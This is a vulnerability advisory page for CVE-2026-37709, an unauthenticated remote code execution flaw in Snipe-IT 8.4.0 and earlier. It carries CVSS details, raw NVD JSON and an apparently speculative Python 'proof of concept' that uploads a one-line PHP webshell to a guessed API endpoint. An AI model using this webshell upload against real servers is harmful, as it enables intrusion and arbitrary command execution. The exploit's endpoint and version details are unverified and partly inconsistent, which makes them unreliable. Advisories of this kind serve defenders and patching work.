Security Vulnerability Report
中文
CVE-2026-37709 CVSS 9.8 CRITICAL

CVE-2026-37709

Published: 2026-05-07 18:16:19
Last Modified: 2026-05-07 18:50:26

Description

Insecure Permissions vulnerability in grokability snipe-it v.8.4.0 and before and fixed after 2026-03-10 commit 676a9958 allows a remote attacker to execute arbitrary code via the app/Http/Controllers/Api/UploadedFilesController.php component

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Snipe-IT <= 8.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: Snipe-IT < 8.4.0 - RCE via UploadedFilesController # Date: 2026-05-07 # Exploit Author: Analyst # Vendor Homepage: https://snipeitapp.com # Software Link: https://github.com/grokability/snipe-it # Version: <= 8.4.0 # Tested on: Linux/Unix target_url = "http://target-url/api/v1/uploaded-files" # Example endpoint based on controller name # Malicious payload to execute (e.g., a PHP webshell or system command) payload = { "file": ("shell.php", "<?php system($_GET['cmd']); ?>", "application/octet-stream") } try: response = requests.post(target_url, files=payload) if response.status_code == 200: print("[+] Payload uploaded successfully!") print("[+] Check the upload path for execution.") else: print(f"[-] Failed to upload. Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-37709", "sourceIdentifier": "[email protected]", "published": "2026-05-07T18:16:19.013", "lastModified": "2026-05-07T18:50:25.993", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure Permissions vulnerability in grokability snipe-it v.8.4.0 and before and fixed after 2026-03-10 commit 676a9958 allows a remote attacker to execute arbitrary code via the app/Http/Controllers/Api/UploadedFilesController.php component"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/grokability/snipe-it/commit/676a9958895a77de340565e7a0b17ae744664904", "source": "[email protected]"}, {"url": "https://github.com/grokability/snipe-it/security/advisories/GHSA-xg82-2hrv-hf64", "source": "[email protected]"}]}}